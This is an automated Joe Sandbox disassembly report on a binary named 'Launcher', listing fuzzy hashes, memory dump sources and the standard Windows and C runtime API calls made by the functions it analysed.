                                                                                                                                                                                                                                                            • Instruction ID: 6ac655ebf42a95564a74a31e614aa41ea3b1e073d78e2650f39b6abf42ebcb95
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 750d46d208c488927feed25b99d22d654afb573b01144273f5180a6ff699df46
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F51D176A84206BFDB288F14D872B7AB3A8EF94314F14853BE80797791D731AD80D791
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E05D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,009E1D78,?,00000000,-00000008), ref: 009E0632
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009E61F6
                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 009E61FD
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009E6237
                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 009E623E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                                                                                            • Opcode ID: 168a930e34073cbc8533617823debc202e73c12cbbc23653c1058ffd30a07c74
                                                                                                                                                                                                                                                            • Instruction ID: d40d8ba1b75cd36b6e374308499130af18fdb457feb58e2d3224e23947dcff56
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 168a930e34073cbc8533617823debc202e73c12cbbc23653c1058ffd30a07c74
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA219871604246AFDB22AFA38881A2AB7ADFFA43A4710C519F929D7351D734EC40CB51
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 2a5e2893aa68d2bae92aaf3c12065db3179dedb83fb3ca92def48a20fbbe674d
                                                                                                                                                                                                                                                            • Instruction ID: a44e552668b442091b7d620eb4f0bdd50ed87bf8a81e8e881417d107356c3c36
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a5e2893aa68d2bae92aaf3c12065db3179dedb83fb3ca92def48a20fbbe674d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16218E71288206AF9B10AFE19881E6AF7ACEF90364750C61AFD2597351F730EC40E7A0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 009E7590
                                                                                                                                                                                                                                                              • Part of subcall function 009E05D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,009E1D78,?,00000000,-00000008), ref: 009E0632
                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009E75C8
                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009E75E8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                                                                                            • Opcode ID: 9d32530afe9ed766aef9d66f11df0151302954d0569c9658b1ebe352468b7429
                                                                                                                                                                                                                                                            • Instruction ID: 239675efb1b77a9e0855da071b82b60724ff99229548b27b622733fbd284943a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d32530afe9ed766aef9d66f11df0151302954d0569c9658b1ebe352468b7429
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C1140E2509AD5BEA61323F75D8AE7FA9ACCEC939C7100824F905D1101FEA8CE0181B7
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 009D3296
                                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 009D32A0
                                                                                                                                                                                                                                                              • Part of subcall function 009C4360: std::_Lockit::_Lockit.LIBCPMT ref: 009C438E
                                                                                                                                                                                                                                                              • Part of subcall function 009C4360: std::_Lockit::~_Lockit.LIBCPMT ref: 009C43B9
                                                                                                                                                                                                                                                            • codecvt.LIBCPMT ref: 009D32DA
                                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 009D3311
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3716348337-0
                                                                                                                                                                                                                                                            • Opcode ID: 9a25a3556e290432344becc6e7c1c9171b3f48f3a1c105fd660668da78c2599a
                                                                                                                                                                                                                                                            • Instruction ID: 9f8953b355a2b432b571a3e10a4fce9a172668cf75daed4a84d459d681882ca1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a25a3556e290432344becc6e7c1c9171b3f48f3a1c105fd660668da78c2599a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F101D636E502199BCB15EBA4EA05BBDB7B5AFC0711F54800AF511AB391CF349E00CB82
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,009EE59F,00000000,00000001,?,?,?,009E8758,?,00000000,00000000), ref: 009EF0C7
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,009EE59F,00000000,00000001,?,?,?,009E8758,?,00000000,00000000,?,?,?,009E809E,?), ref: 009EF0D3
                                                                                                                                                                                                                                                              • Part of subcall function 009EF124: CloseHandle.KERNEL32(FFFFFFFE,009EF0E3,?,009EE59F,00000000,00000001,?,?,?,009E8758,?,00000000,00000000,?,?), ref: 009EF134
                                                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 009EF0E3
                                                                                                                                                                                                                                                              • Part of subcall function 009EF105: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,009EF0A1,009EE58C,?,?,009E8758,?,00000000,00000000,?), ref: 009EF118
                                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,009EE59F,00000000,00000001,?,?,?,009E8758,?,00000000,00000000,?), ref: 009EF0F8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                                                            • Opcode ID: 3a102fa1bbc8785d894cc1cd3d303d6d0f1e57517ee3173440fdfe91b63745cc
                                                                                                                                                                                                                                                            • Instruction ID: 049b26bac393ab25d7f29704551f4326161ffffe92ef9fc030df86249a3916d0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a102fa1bbc8785d894cc1cd3d303d6d0f1e57517ee3173440fdfe91b63745cc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF0AC3651C159FBCF225FD6DC18AA93F6AFF483A1B054425FA1895130D6328C20EB91
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 009D4C22
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 009D4C31
                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 009D4C3A
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 009D4C47
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                                            • Opcode ID: 2b95b3c9b31e19e0621f615348ce444f065d15a68c162134bce7c34190d8cf69
                                                                                                                                                                                                                                                            • Instruction ID: 64c160d76dcd5aed05adf158ffb3f33e6ac5072a2e7a416f4d5472309dd45f95
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b95b3c9b31e19e0621f615348ce444f065d15a68c162134bce7c34190d8cf69
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AF0B2B0C2420CEBCB00DBB4C94999EBBF4FF1C200B914995A412E7110E730AB44EF51
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: GetLastError.KERNEL32(00000000,?,009E2A49), ref: 009E0717
                                                                                                                                                                                                                                                              • Part of subcall function 009E0713: SetLastError.KERNEL32(00000000,?,?,00000028,009DD2C9), ref: 009E07B9
                                                                                                                                                                                                                                                            • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,009DAB4D,?,?,?,00000055,?,-00000050,?,?,?), ref: 009E4E31
                                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,009DAB4D,?,?,?,00000055,?,-00000050,?,?), ref: 009E4E68
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                                                            • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                            • Opcode ID: c4177ddf1078c79836d9f7ff28944c6f89d27bc12610086349cc09cdbc709185
                                                                                                                                                                                                                                                            • Instruction ID: 72b71da9feeebd91119ec79ab51935d5076c8657aa70ea87999288d85b59c81c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4177ddf1078c79836d9f7ff28944c6f89d27bc12610086349cc09cdbc709185
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D51D671A04781AADB27AB37CC46BA673ACFF85B00F154869F545DB1C1FB70ED4086A1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 009E2229: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 009E2254
                                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,009E2434,?,00000000,?,?,?), ref: 009E2085
                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,009E2434,?,00000000,?,?,?), ref: 009E20C1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 546120528-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: ee318487d315a4a9a1ba5237c7f67b8627b1844e42903dbdde2da686d43347ac
                                                                                                                                                                                                                                                            • Instruction ID: 8f05aa70be1366a02d69718e95c0adfba39b2b099fd79584c6586232c8919486
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee318487d315a4a9a1ba5237c7f67b8627b1844e42903dbdde2da686d43347ac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48512471A043859EDB26CF36C881ABABBFDFF85300F18446ED29687251E6749E46CB40
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E7032
                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00001000,?,00000000,009E7451,00000001,00000000,?,009DC905,?,?,?,?,?), ref: 009E70B8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 1834446548-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 20767bba07010f57156272b4d7668994a5f60cc7b683b473231c8c201c8527b1
                                                                                                                                                                                                                                                            • Instruction ID: ad23a25bfb2e9b5551d04549c542f0e34390f781d05543c82a6449f71956a01a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20767bba07010f57156272b4d7668994a5f60cc7b683b473231c8c201c8527b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF41F031A082D9ABCF26CFA6CC80BE9B3B9AB48304F1481A9E54997241D774DEC19F51
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,009DFE49,?,?,00000000,00000000,00000000,?), ref: 009DFF6D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                            • Opcode ID: a47db73c8a48a87a2f762be585b1442abc223715668b5784bcccb9f4ae0c418d
                                                                                                                                                                                                                                                            • Instruction ID: 68c461e0e833d82ae68c7eb061ff714f03956826df848e223405de7d4d9c9456
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a47db73c8a48a87a2f762be585b1442abc223715668b5784bcccb9f4ae0c418d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C418B32900149AFCF26DF98CC81AEEBBB9FF88301F188069FA1567225D3759D90DB50
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,009E8113,?,009D83F3,?,?,?,00000000,?,?,?,?), ref: 009E8A42
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(009E8113,?,009D83F3,?,?,?,00000000,?,?,?,?,?,009D8191,?,009D83F3), ref: 009E8A72
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 442123175-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 51e8b56dc80c63e1267abde5c6a03f6bbdaf8d365ca591917a2f4c5ed81d2c2b
                                                                                                                                                                                                                                                            • Instruction ID: 1f6d10f8902f81d22c7b4ef7123b3bf783c6ee75749baa44020cf2c03b8a0b84
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e8b56dc80c63e1267abde5c6a03f6bbdaf8d365ca591917a2f4c5ed81d2c2b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17315071B10259AFDB25CF99DC91BEA77A9AF48304F1440BAE509D7290DA70ED80CF61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 009DFA2B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
